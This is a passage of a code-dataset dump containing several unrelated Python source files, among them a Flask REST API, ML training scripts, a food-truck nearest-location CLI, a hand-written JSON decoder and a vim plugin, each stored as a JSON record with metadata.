root!')\n response = JsonResponse(json.dumps({\n 'posts': url_for('get_posts', _external=True),\n 'users': url_for('get_users', _external=True),\n 'comments': url_for('get_comments', _external=True),\n }), 200)\n response.add_etag()\n return response\n\n@api.route('/posts/', methods=['GET'])\ndef get_posts():\n items = models.Post.query.order_by('id').all()\n response = JsonResponse(\n json.dumps([i.to_dict() for i in items]),\n status=200\n )\n response.set_etag(_create_etag('i am not a static value, i promise ;)'))\n response.cache_control.max_age = 3600\n response.cache_control.no_cache = True\n return response\n\n@api.route('/posts//', methods=['GET'])\ndef get_post(id):\n item = models.Post.query.get(int(id))\n accept_header = request.accept_mimetypes.best_match(['application/json', 'image/webp'])\n if accept_header == 'application/json':\n response = JsonResponse(json.dumps(item.to_dict()), status=200)\n else:\n contenttype, encoding = mimetypes.guess_type(item.image)\n response = Response(read_resource(item.image), status=200, content_type=contenttype)\n response.last_modified = item.timestamp\n response.set_etag(_create_etag([item.timestamp, accept_header]))\n response.cache_control.max_age = 31556952\n response.cache_control.no_cache = True\n response.make_conditional(request)\n return response\n\n@api.route('/users//posts/', methods=['GET'])\ndef get_user_posts(id):\n items = models.Post.query.order_by('id').filter(models.Post.user_id == id)\n return JsonResponse(\n json.dumps([i.to_dict() for i in items]),\n status=200\n )\n\n@api.route('/users/', methods=['GET'])\ndef get_users():\n items = models.User.query.order_by('id').all()\n return JsonResponse(\n json.dumps([i.to_dict() for i in items]),\n status=200\n )\n\n@api.route('/users//', methods=['GET'])\ndef get_user(id):\n item = models.User.query.get(int(id))\n response = JsonResponse(\n json.dumps(item.to_dict()),\n status=200\n )\n response.add_etag()\n response.cache_control.max_age = 31556952\n response.make_conditional(request)\n return response\n\n@api.route('/users/', methods=['POST'])\ndef update_user():\n post = next(iter(request.form))\n d = json.loads(post)\n user = models.User(name=d['name'])\n db.session.add(user)\n db.session.commit()\n return JsonResponse(None, 201)\n\n@api.route('/users//', methods=['DELETE'])\ndef delete_user(id):\n user = models.User.query.get(id)\n if not user:\n return JsonResponse(None, 404)\n db.session.delete(user)\n db.session.commit()\n return JsonResponse(None, 200)\n\n@api.route('/comments/', methods=['GET'])\ndef get_comments():\n items = models.Comment.query.order_by('id').all()\n return JsonResponse(\n json.dumps([i.to_dict() for i in items]),\n status=200\n )\n\n@api.route('/comments/', methods=['POST', 'PUT', 'DELETE'])\ndef change_comments():\n raise NotImplementedError\n\n@api.route('/posts//comments/', methods=['GET', 'POST', 'PUT', 'DELETE'])\ndef get_post_comments(id):\n raise NotImplementedError\n\n@api.route('/user//comments/', methods=['GET', 'POST', 'PUT', 'DELETE'])\ndef get_user_comments(id):\n raise NotImplementedError\n","sub_path":"server/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"87369513","text":"import csv\nfrom sklearn.linear_model.logistic import LogisticRegression\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn import svm\nimport numpy as np\ndata=[]\nmark=[]\nwith open('/Users/hhy/Desktop/test/data.csv','r',encoding='utf-8_sig') as f:\n csv_reader=csv.reader(f)\n for x in csv_reader:\n data.append(list(map(float,x[0:-1])))\n mark.append(float(x[-1]))\n\nparam_test1= {'C':[x for x in np.arange(2,10,0.2)]}\nparameters = {'kernel': ('linear', 'sigmoid'), 'C': [2,2.1,2.2],'gamma':[0.00001,0.0001,0.0003,0.0005,0.001,0.002]}\n\n#cv = cross_validation.ShuffleSplit(len(data), n_iter=5, test_size=0.1, random_state=i)\n\ngsearch1= GridSearchCV(estimator = svm.SVC(random_state=1113),\n param_grid =parameters, scoring='roc_auc',cv=5)\ngsearch1.fit(data,mark)\nprint(gsearch1.grid_scores_,gsearch1.best_params_, gsearch1.best_score_)\n\n\n'''\ny_pred = gsearch1.predict(data)\ny_predprob = gsearch1.predict_proba(data)\nprint('准确率:',gsearch1.score(data, mark))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(mark, y_predprob))\n'''","sub_path":"Graduation/parameter_adjusting/FElogistic.py","file_name":"FElogistic.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"55177779","text":"import os\nos.environ[\"PYTHON_EGG_CACHE\"] = \"/rds/projects/2018/hesz01/poincare-embeddings/python-eggs\"\n\nimport random\nimport numpy as np\nimport networkx as nx\n\nimport argparse\n\nfrom heat.utils import load_data\n\ndef write_edgelist_to_file(edgelist, file):\n\twith open(file, \"w+\") as f:\n\t\tfor u, v in edgelist:\n\t\t\tf.write(\"{}\\t{}\\n\".format(u, v))\n\ndef split_edges(edges, non_edges, seed, val_split=0.00, test_split=0.15, neg_mul=1):\n\t\n\tnum_val_edges = int(np.ceil(len(edges) * val_split))\n\tnum_test_edges = int(np.ceil(len(edges) * test_split))\n\n\trandom.seed(seed)\n\trandom.shuffle(edges)\n\trandom.shuffle(non_edges)\n\n\tval_edges = edges[:num_val_edges]\n\ttest_edges = edges[num_val_edges:num_val_edges+num_test_edges]\n\ttrain_edges = edges[num_val_edges+num_test_edges:]\n\n\tval_non_edges = non_edges[:num_val_edges*neg_mul]\n\ttest_non_edges = non_edges[num_val_edges*neg_mul:num_val_edges*neg_mul+num_test_edges*neg_mul]\n\n\treturn train_edges, (val_edges, val_non_edges), (test_edges, test_non_edges)\n\ndef parse_args():\n\t'''\n\tparse args from the command line\n\t'''\n\tparser = argparse.ArgumentParser(description=\"Script to remove edges for link prediction experiments\")\n\n\tparser.add_argument(\"--edgelist\", dest=\"edgelist\", type=str, default=\"datasets/cora_ml/edgelist.tsv\",\n\t\thelp=\"edgelist to load.\")\n\tparser.add_argument(\"--features\", dest=\"features\", type=str, default=\"datasets/cora_ml/feats.csv\",\n\t\thelp=\"features to load.\")\n\tparser.add_argument(\"--labels\", dest=\"labels\", type=str, default=\"datasets/cora_ml/labels.csv\",\n\t\thelp=\"path to labels\")\n\tparser.add_argument(\"--output\", dest=\"output\", type=str, default=\"edgelists/cora_ml\",\n\t\thelp=\"path to save training and removed edges\")\n\n\tparser.add_argument('--directed', action=\"store_true\", help='flag to train on directed graph')\n\n\tparser.add_argument(\"--seed\", type=int, default=0)\n\n\targs = parser.parse_args()\n\treturn args\n\ndef main():\n\n\targs = parse_args()\n\n\tseed= args.seed\n\ttraining_edgelist_dir = os.path.join(args.output, \"seed={:03d}\".format(seed), \"training_edges\")\n\tremoved_edges_dir = os.path.join(args.output, \"seed={:03d}\".format(seed), \"removed_edges\")\n\n\tif not os.path.exists(training_edgelist_dir):\n\t\tos.makedirs(training_edgelist_dir, exist_ok=True)\n\tif not os.path.exists(removed_edges_dir):\n\t\tos.makedirs(removed_edges_dir, exist_ok=True)\n\n\ttraining_edgelist_fn = os.path.join(training_edgelist_dir, \"edgelist.tsv\")\n\tval_edgelist_fn = os.path.join(removed_edges_dir, \"val_edges.tsv\")\n\tval_non_edgelist_fn = os.path.join(removed_edges_dir, \"val_non_edges.tsv\")\n\ttest_edgelist_fn = os.path.join(removed_edges_dir, \"test_edges.tsv\")\n\ttest_non_edgelist_fn = os.path.join(removed_edges_dir, \"test_non_edges.tsv\")\n\t\n\tgraph, features, node_labels = load_data(args)\n\tprint(\"loaded dataset\")\n\n\tedges = list(graph.edges())\n\tnon_edges = list(nx.non_edges(graph))\n\n\t_, (val_edges, val_non_edges), (test_edges, test_non_edges) = split_edges(edges, non_edges, seed)\n\n\tfor edge in test_edges:\n\t\tassert edge in graph.edges() or edge[::-1] in graph.edges()\n\n\tgraph.remove_edges_from(val_edges + test_edges)\n\tgraph.add_edges_from(((u, u, {\"weight\": 0}) for u in graph.nodes())) # ensure that every node appears at least once by adding self loops\n\n\tprint (\"removed edges\")\n\n\tnx.write_edgelist(graph, training_edgelist_fn, delimiter=\"\\t\", data=[\"weight\"])\n\twrite_edgelist_to_file(val_edges, val_edgelist_fn)\n\twrite_edgelist_to_file(val_non_edges, val_non_edgelist_fn)\n\twrite_edgelist_to_file(test_edges, test_edgelist_fn)\n\twrite_edgelist_to_file(test_non_edges, test_non_edgelist_fn)\n\n\tprint (\"done\")\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"remove_edges.py","file_name":"remove_edges.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142985466","text":"from setuptools import setup, find_packages\n\n\n__VERSION__ = '0.1'\n\nREQUIREMENTS = [\n\t'python-bitcoinlib'\n]\n\nsetup(\n\tname='exchange-payments',\n\tversion=__VERSION__,\n\tdescription='Exchange payments package',\n\tauthor='Juliano Gouveia',\n\tauthor_email='juliano@neosacode.com',\n\tkeywords='exchange, payments, neosacode, coins',\n\tinstall_requires=REQUIREMENTS,\n\tpackages=find_packages(exclude=[]),\n\tpython_requires='>=3.5'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639617212","text":"# -*- coding: utf-8 -*- \n\n# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:\n#Copyright (c) 2006 Ali Afshar aafshar@gmail.com\n\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n\n#The above copyright notice and this permission notice shall be included in\n#all copies or substantial portions of the Software.\n\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\n\nimport gtk\nimport pida.utils.vim.vimcom as vimcom\nimport pida.utils.vim.vimeditor as vimeditor\nimport pida.core.service as service\nimport pida.pidagtk.contentview as contentview\nimport pida.pidagtk.icons as icons\n\n\nclass vim_plugin_view(gtk.HBox):\n \"\"\"View holding the vim controls.\"\"\"\n\n def __init__(self, service):\n self.service = service\n gtk.HBox.__init__(self, spacing=3)\n icon = icons.icons.get_image('vim')\n self.pack_start(icon, expand=False)\n self.__serverlist = gtk.combo_box_new_text()\n self.pack_start(self.__serverlist)\n\n def set_serverlist(self, serverlist):\n current = self.__serverlist.get_active_text()\n self.__serverlist.get_model().clear()\n j = 0\n for i, server in enumerate(serverlist):\n self.__serverlist.append_text(server)\n if server == current:\n self.__serverlist.set_active(i)\n j = 1\n if j == 0:\n self.__serverlist.append_text('no vim running')\n self.__serverlist.set_sensitive(False)\n else:\n self.__serverlist.set_sensitive(True)\n if self.__serverlist.get_active() == -1:\n self.__serverlist.set_active(0)\n self.__serverlist.show_all()\n \n def get_current_server(self):\n return self.__serverlist.get_active_text()\n current_server = property(get_current_server)\n\n\nclass vim_multi_editor(vimeditor.vim_editor, service.service):\n\n display_name = 'External Vim'\n\n def start(self):\n self.__oldservers = []\n self.view = vim_plugin_view(service=self)\n self.__cw = vimcom.communication_window(self)\n self.view.show_all()\n self.get_service('buffermanager').\\\n plugin_view.widget.pack_start(self.view, expand=False)\n self.get_service('editormanager').events.emit('started')\n\n def vim_new_serverlist(self, serverlist):\n def _serverlist():\n for server in serverlist:\n if 'PIDA_EMBEDDED' not in server:\n if server not in self.__oldservers:\n self.__cw.init_server(server)\n yield server\n self.view.set_serverlist(_serverlist())\n self.__oldservers = serverlist\n\n def get_server(self):\n return self.view.current_server\n server = property(get_server)\n\n\nService = vim_multi_editor\n\n","sub_path":"branches/newview/pida/editors/vimmultiedit.py","file_name":"vimmultiedit.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"241444996","text":"import numpy as np\nimport random\n\nnumtrained = 100\nnumtest = 10000\ntrainerror = .1\n\ndef nonlin(x, deriv=False):\n if (deriv == True):\n return x * (1 - x)\n return 1 / (1 + np.exp(-x))\n\ninp = []\nout = []\nfor x in range(numtrained):\n xval = random.random()*4 - 2\n yval = random.random()*4 - 2\n inp.append([xval,yval,1])\n if xval**2+yval**2<1:\n out.append([1])\n else:\n out.append([0])\nX = np.array(inp)\ny = np.array(out)\n\nnp.random.seed(1)\nsyn0 = 2 * np.random.random((3, 4)) - 1\nsyn1 = 2 * np.random.random((4, 1)) - 1\n\nerror = 9999.9\nit = 0\nwhile error > trainerror:\n it+=1\n l0 = X\n l1 = nonlin(np.dot(l0, syn0))\n l2 = nonlin(np.dot(l1, syn1))\n l2_error = y - l2\n # if it%100==0:\n print(\"Error:\" + str(np.mean(np.abs(l2_error))))\n error = np.mean(np.abs(l2_error))\n l2_delta = l2_error * nonlin(l2, deriv=True)\n l1_error = l2_delta.dot(syn1.T)\n l1_delta = l1_error * nonlin(l1, deriv=True)\n\n syn1 += l1.T.dot(l2_delta)\n syn0 += l0.T.dot(l1_delta)\n\ninptest = []\nouttest = []\nfor i in range(numtest):\n xval = random.random()*4 - 2\n yval = random.random()*4 - 2\n inptest.append([xval,yval,1])\n if xval**2+yval**2<1:\n outtest.append([1])\n else:\n outtest.append([0])\nxtest = np.array(inptest)\nytest = np.array(outtest)\nl0test = xtest\nl1test = nonlin(np.dot(l0test, syn0))\nl2test = nonlin(np.dot(l1test, syn1))\n# print(l2test.tolist())\n# print(ytest.tolist())\nexpY = l2test.tolist()\ntheY = ytest.tolist()\nwrong = 0\nfor k in range(len(expY)):\n for o in range(len(expY[k])):\n if (expY[k][o]>.5 and theY[k][o]==0) or (expY[k][o]<.5 and theY[k][o]==1):\n wrong += 1\nprint(wrong,'wrong out of',numtest)\n\nprint('\\nWeights:',syn0,',',syn1)\nprint('\\nIterations:',it)","sub_path":"unitcircle-numpy.py","file_name":"unitcircle-numpy.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202740625","text":"from brainfuck import BFInterpreter\nimport signal\n\ndigit_to_command = {\n 0 : \">\",\n 1 : \"<\",\n 2 : \"+\",\n 3 : \"-\",\n 4 : \".\",\n 5 : \"[\",\n 6 : \"]\"\n}\n\n\ndef to_program(num):\n program = \"\"\n while num > 0:\n program += digit_to_command[num % 7]\n num //= 7\n return program\n\n\ndef timeout(signum, frame):\n print(\"Timeout\")\n raise Exception(\"Time out\")\n\ndef main():\n bf = BFInterpreter()\n counter = 0\n while True:\n program = to_program(counter)\n try:\n print(program, end=' ')\n signal.signal(signal.SIGALRM, timeout)\n signal.alarm(1)\n bf.evaluate(program)\n bf.reset()\n print()\n except:\n bf.reset()\n print()\n counter += 1\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"minimal_hello.py","file_name":"minimal_hello.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"349214021","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport csv\nimport json\nimport os\nimport pickle\nfrom io import StringIO\n\nfrom sffdtruck import CONSTS, __version__, kdtree\nfrom sffdtruck.retrieve import retrieve\n\n# Importing 3rd party distance calculation packages\n# If not downloaded, we'll use local version.\n# We've added a local version to make\ntry:\n from vincenty import vincenty as dist_vincenty\nexcept ImportError:\n from sffdtruck.external.vincenty import vincenty as dist_vincenty\n\ntry:\n from haversine import haversine as dist_haversine\nexcept ImportError:\n from sffdtruck.external.haversine import haversine as dist_haversine\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser(\"sffdtruck\")\n version = \"%(prog)s \" + __version__\n parser.add_argument(\n \"--lat-lon\",\n \"-l\",\n nargs=2,\n dest=\"lat_lon\",\n required=True,\n help=\"\"\"Specify target (latitude, longitude). Eg. `-l -37.234124 74.812810`\"\"\",\n )\n parser.add_argument(\n \"--update\",\n default=False,\n action=\"store_true\",\n help=\"\"\"Update existing cache.\"\"\",\n )\n parser.add_argument(\n \"--timeout\", \"-t\", default=3, type=int, help=\"\"\"Download timeout.\"\"\"\n )\n parser.add_argument(\n \"--count\", \"-c\", default=5, type=int, help=\"\"\"Number of locations to return.\"\"\",\n )\n parser.add_argument(\n \"--radius\",\n \"-r\",\n default=float(\"Inf\"),\n type=float,\n help=\"\"\"Return results within {radius} Miles.\"\"\",\n )\n parser.add_argument(\n \"--dist\",\n \"-d\",\n default=\"haversine\",\n choices=[\"euclidean\", \"e\", \"haversine\", \"h\", \"vincenty\", \"v\"],\n help=\"\"\"Distance calculation function\"\"\",\n )\n parser.add_argument(\n \"--format\",\n \"-f\",\n default=\"plain\",\n choices=[\"csv\", \"json\", \"plain\"],\n help=\"\"\"Output format (shown in closest-first order)\"\"\",\n )\n parser.add_argument(\"--version\", \"-v\", action=\"version\", version=version)\n return parser\n\n\ndef get_dist_fn(dist_type, radius_miles=float(\"Inf\")):\n def radius_dist(p1, p2, dist_fn):\n d = dist_fn(p1, p2)\n # Convert to km\n if d <= radius_miles * 1.609344:\n return d\n else:\n return float(\"Inf\")\n\n if dist_type[0] == \"h\":\n dist_fn = dist_haversine\n elif dist_type[0] == \"v\":\n dist_fn = dist_vincenty\n else:\n dist_fn = kdtree.dist_sq\n\n if radius_miles != float(\"Inf\"):\n if dist_type[0] == \"e\":\n print(\n \"Euclidean lat/lon distance is not a real distance. Use Haversine or Vincenty distance for radius search\\n\"\n )\n else:\n return lambda p1, p2: radius_dist(p1, p2, dist_fn)\n\n return dist_fn\n\n\ndef get_output(out_type, input_nodes):\n if input_nodes is None or len(input_nodes) == 0:\n return \"Nothing was found in the search!!\"\n\n capture = [\"Applicant\", \"Address\", \"FacilityType\", \"FoodItems\"]\n console_format = [\n \"Food Truck Name : {}\",\n \"Address : {}\",\n \"Truck Type : {}\",\n \"Available Items : {}\",\n \"Location : {}\",\n ]\n out = None\n if out_type[0] == \"c\":\n header = \",\".join(capture) + \",Location\\n\"\n with StringIO() as sio:\n sio.writelines(header)\n for inode in input_nodes:\n sio.writelines(\n [\n \",\".join([inode.ft_data.data[c] for c in capture]),\n f',{inode.ft_data.data[\"Location\"]}',\n \"\\n\",\n ]\n )\n out = sio.getvalue()\n elif out_type[0] == \"j\":\n out = {\n \"food_trucks\": [\n {\n **{c: inode.ft_data.data[c] for c in capture},\n **{\"Location\": inode.ft_data.latlon},\n }\n for inode in input_nodes\n ]\n }\n out = json.dumps(out, indent=2)\n else:\n with StringIO() as sio:\n sio.writelines(\"----(Closest)---- \\n\")\n for inode in input_nodes:\n form_val = [inode.ft_data.data[c] for c in capture]\n form_val.append(inode.ft_data.latlon)\n sio.writelines(\"\\n\".join(console_format).format(*form_val))\n sio.writelines(\"\\n-----------------\\n\")\n out = sio.getvalue()\n\n return out\n\n\ndef main(args=None):\n args = arg_parser().parse_args(args)\n # Initilize cache dir\n if not os.path.exists(CONSTS.cache_dir):\n os.makedirs(CONSTS.cache_dir)\n\n csv_bytes, is_newer = retrieve(check_update=args.update, timeout=args.timeout)\n if is_newer:\n # We read CSV and 're-'build KDTree cache\n try:\n with StringIO(csv_bytes) as sio:\n all_csv_entries = list(csv.DictReader(sio))\n valid_entries = [\n kdtree.FTData(d)\n for d in all_csv_entries\n if float(d[\"Latitude\"]) != 0 and float(d[\"Longitude\"]) != 0\n ]\n if len(all_csv_entries) != len(valid_entries):\n print(\n f\"There were {len(all_csv_entries) - len(valid_entries)} entries with no Lat/Lon values\"\n )\n tree_root = kdtree.FTNode.build_tree(valid_entries)\n if tree_root is None:\n raise ValueError(\"Cannot create tree from CSV data\")\n with open(CONSTS.kdtree_cache_file, \"wb\") as f:\n pickle.dump(tree_root, f, pickle.HIGHEST_PROTOCOL)\n # Pickle the 'data' dictionary using the highest protocol available.\n except Exception as e:\n print(\"Could not read csv and create tree\", e)\n exit(1)\n else:\n try:\n with open(CONSTS.kdtree_cache_file, \"rb\") as f:\n tree_root = pickle.load(f)\n except Exception as e:\n print(\"Cannot unpickle cached data\", e)\n exit(1)\n\n # Now we have a tree_root\n # Perform the search\n lat_lon = (float(args.lat_lon[0]), float(args.lat_lon[1]))\n res = tree_root.search(\n lat_lon, k=args.count, dist_fn=get_dist_fn(args.dist[0], args.radius)\n )\n\n # s=json.dumps({'output':[r.ft_data.to_json() for r in res]}, indent=2)\n # for r in res:\n print(get_output(args.format, res))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sffdtruck/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420203457","text":"import re\n\nFLAGS = re.DOTALL | re.MULTILINE | re.VERBOSE\n\nSTRINGCHUNK = re.compile(r'(.*?)([\"\\\\\\x00-\\x1f])', FLAGS)\nNUMBER = re.compile(r'(-?(?:0|[1-9]\\d*))(\\.\\d+)?([eE][-+]?\\d+)?', FLAGS)\n\nBACKSLASH_DICT = {\n '\"': '\"', '\\\\': '\\\\', '/': '/',\n 'b': '\\b', 'f': '\\f', 'n': '\\n', 'r': '\\r', 't': '\\t',\n}\n\n\nclass JSONDecoderError(ValueError):\n def __init__(self, msg, json_str, pos):\n lineno = json_str.count('\\n', 0, pos) + 1\n colno = pos - json_str.rfind('\\n', 0, pos)\n error_msg = '{0}: line {1} column {2} (char {3})'.format(msg, lineno, colno, pos)\n super().__init__(error_msg)\n\n\ndef decode_string(s, backslash=BACKSLASH_DICT, chunk_match=STRINGCHUNK.match):\n \"\"\"Scan the string s for a JSON string.\"\"\"\n\n chunks = []\n begin, end = 0, 1\n while True:\n chunk = chunk_match(s, end)\n if chunk is None:\n raise JSONDecoderError('Unterminated string starting at', s, begin)\n end = chunk.end()\n content, terminator = chunk.groups()\n if content:\n chunks.append(content)\n if terminator == '\"':\n break\n elif terminator != '\\\\':\n raise JSONDecoderError('Invalid control character {!r} at'.format(terminator), s, end - 1)\n try:\n esc = s[end]\n except IndexError:\n raise JSONDecoderError('Unterminated string starting at', s, begin) from None\n try:\n char = backslash[esc]\n except KeyError:\n raise JSONDecoderError('Invalid \\\\escape: {!r}'.format(esc), s, end - 1)\n end += 1\n chunks.append(char)\n\n return ''.join(chunks)\n\n\ndef decode_array(json_array):\n sep = ', '\n arr = json_array[1:-1].split(sep)\n for idx in range(len(arr)):\n if idx == len(arr):\n break\n c1 = arr[idx].count('[')\n c2 = arr[idx].count(']')\n c3 = arr[idx].count('{')\n c4 = arr[idx].count('}')\n if c1 > c2 >= 0 or c3 > c4 >= 0:\n while c1 != c2 or c3 != c4:\n try:\n arr[idx] += sep + arr[idx + 1]\n del arr[idx + 1]\n except IndexError:\n raise JSONDecoderError('Unterminated json array starting at', json_array, 0) from None\n c1 = arr[idx].count('[')\n c2 = arr[idx].count(']')\n c3 = arr[idx].count('{')\n c4 = arr[idx].count('}')\n\n python_list = []\n for s in arr:\n if s != '':\n obj = from_json(s)\n python_list.append(obj)\n\n return python_list\n\n\ndef decode_object(json_obj):\n python_dict = {}\n item_sep = ', '\n key_sep = ': '\n arr = json_obj[1:-1].split(item_sep)\n idx = 0\n while idx != len(arr) - 1:\n next_idx = idx + 1\n c1 = arr[idx].count('{')\n c2 = arr[idx].count('}')\n if arr[next_idx].count(key_sep) and c1 == c2:\n idx += 1\n else:\n arr[idx] += item_sep + arr[next_idx]\n del arr[next_idx]\n\n for item in arr:\n res = item.split(key_sep)\n if len(res) >= 2:\n key, val = from_json(res[0]), res[1]\n if not isinstance(key, str):\n raise JSONDecoderError('Expecting property name enclosed in double quotes',\n json_obj, json_obj.index(res[0]))\n for i in range(2, len(res)):\n val += key_sep + res[i]\n python_dict[key] = from_json(val)\n else:\n raise JSONDecoderError('Invalid json object starting at', json_obj, 0)\n\n return python_dict\n\n\ndef decode_number(num, number_match):\n idx = 0\n match = number_match(num, idx)\n if match is not None:\n integer, frac, exp = match.groups()\n valid_str = ''\n for item in match.groups():\n if item:\n valid_str += str(item)\n if num != valid_str:\n return None\n if frac or exp:\n res = float(integer + (frac or '') + (exp or ''))\n else:\n res = int(integer)\n return res\n elif num == 'NaN':\n return float('nan')\n elif num == 'Infinity':\n return float('inf')\n elif num == '-Infinity':\n return float('-inf')\n else:\n return None\n\n\ndef from_json(json_string):\n \"\"\"Deserialize a JSON formatted string to a Python object.\"\"\"\n\n if json_string.startswith('\"') and json_string.endswith('\"'):\n return decode_string(json_string)\n elif json_string == 'null':\n return None\n elif json_string == 'true':\n return True\n elif json_string == 'false':\n return False\n elif json_string.startswith('[') and json_string.endswith(']'):\n return decode_array(json_string)\n elif json_string.startswith('{') and json_string.endswith('}'):\n return decode_object(json_string)\n else:\n number = decode_number(json_string, NUMBER.match)\n if number is not None:\n return number\n raise JSONDecoderError('Invalid JSON string', json_string, 0)\n","sub_path":"Solutions/Task2/853502_Павел_Курейчик/Lab2/jsonformatter/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"579067731","text":"# function takes a list of cards and returns all possible 3+ runs, trips, quads\n# suits h, d, c, s\ndef findTrips(cards):\n\tprint ('this is the list that was recv\\'d')\n\tprint ('--------------------------------')\n\tprint (cards)\n\timport copy\n\tcardsCopy = copy.deepcopy(cards)\n\t\n\t# test for 3 of a kind\n\tcardsCopy.sort()\n\tprint ('this is a copy sorted by value')\n\tprint ('------------------------------')\n\tprint (cardsCopy)\n\t# test for 4 of a kind\n\t\n\ttripsCount = 0\n\tfor i in range(len(cardsCopy)-2):\n\t\tif cardsCopy[i][0] == cardsCopy[i+1][0] == cardsCopy[i+2][0]:\t# then there's def trips\n\t\t\t# load each card to var\n\t\t\tfirst = cardsCopy[i]\n\t\t\tsecond = cardsCopy[i+1]\n\t\t\tthird = cardsCopy[i+2]\n\t\t\t\n\t\t\tprint ('trips have been found')\n\t\t\tprint ('---------------------')\n\t\t\tprint (str(first) + ' ' + str(second) + ' ' + str(third))\n\t\n\t\t\ttripsCount = tripsCount + 1\n\t# summary\n\tprint (str(tripsCount) + ' sets of trips found')\n\t# error test\n\tif tripsCount != 3:\n\t\tprint ('3 SETS OF TRIPS NOT DETECTED')\n\t\texit()\n\t\n\nmyHand = [[1, 'h'], [2, 'h'], [3, 'h'], [9, 'd'], [8, 'c'], [7, 'h'], [5, 'd'], [5, 'c'], [5, 's'], [5, 'h'], [12, 's'], [12, 'h'], [12, 'd']]\nfor i in range(1000):\n\timport random\n\trandom.shuffle(myHand)\n\tresults = findPoints(myHand)\n","sub_path":"findPoints.py","file_name":"findPoints.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"60359276","text":"# -*-encoding:utf-8-*-\nimport os, sys, re, codecs, json\nimport pickle\nimport numpy as np\nfrom data_utils import create_dico, create_mapping, zero_digits, get_feature_func\n\n\ndef load_feature_dict(path, config):\n\twith open(path, \"rb\") as f:\n\t\tf_list = pickle.load(f)\n\tfeature_dict = {\"\": {\"idx\": 0}, \"\": {\"idx\": 1}}\n\tfor x, y in enumerate(f_list):\n\t\tfeature = y[0].decode(\"utf-8\")\n\t\tidx = feature.rfind(\":\")\n\t\tf_idx = int(feature[:idx][1])\n\t\tif f_idx in config[\"feature_list\"]:\n\t\t\tfeature_dict[feature] = y[1]\n\t\t\tfeature_dict[feature].update({\"idx\": len(feature_dict)})\n\n\treturn feature_dict\n\n\ndef load_elmo_dict(path):\n\telmo_dict = {}\n\twith open(path, \"rb\") as f:\n\t# with open(path) as f:\n\t\tfor line in f.readlines():\n\t\t\t# print(\"raw line : \", line)\n\t\t\t# print(\"1 line : \", line.decode(\"utf-8\"))\n\t\t\tline = line.decode(\"utf-8\")\n\t\t\tline = line.strip()\n\t\t\telmo_dict[line] = len(elmo_dict)\n\n\treturn elmo_dict\n\n\ndef _load_conll_file(path):\n\t\"\"\"\n\t파일을 읽어 문장 단위 list로 리턴한다.\n\t\"\"\"\n\tsentences = []\n\tsentence = [[], [], []]\n\n\twith codecs.open(path, 'r', 'utf-8') as fp:\n\t\tfor line in fp: # 라인 단위로\n\t\t\tline = line.rstrip()\n\n\t\t\tif not line: # 문장이 끝나면\n\t\t\t\tif len(sentence) > 0:\n\t\t\t\t\tsentences.append(sentence) # 보관한다.\n\t\t\t\t\tsentence = []\n\t\t\telse: # 문장이 진행 중이면\n\t\t\t\tword = line.split()\n\t\t\t\tsentence.append(word)\n\t\tif len(sentence) > 0:\n\t\t\tsentences.append(sentence)\n\treturn sentences\n\n\ndef eojeol_mapping(sentences):\n\t\"\"\"\n\t어절 사전을 구축한다. 안쓸듯...\n\t\"\"\"\n\teojeol = [[[word] for word in s[-2]] for s in sentences]\n\tdico = create_dico(eojeol)\n\tdico[\"\"] = 10000001\n\tdico[''] = 10000000\n\teojeol_to_id, id_to_eojeol = create_mapping(dico)\n\tprint(\"Found %i unique words\" % (len(dico)))\n\treturn dico, eojeol_to_id, id_to_eojeol\n\n\ndef word_mapping(sentences):\n\t\"\"\"\n\t단어 사전을 구축한다.\n\t\"\"\"\n\twords1 = [[[word] for word in s[1]] for s in sentences]\n\twords2 = [[[word] for word in 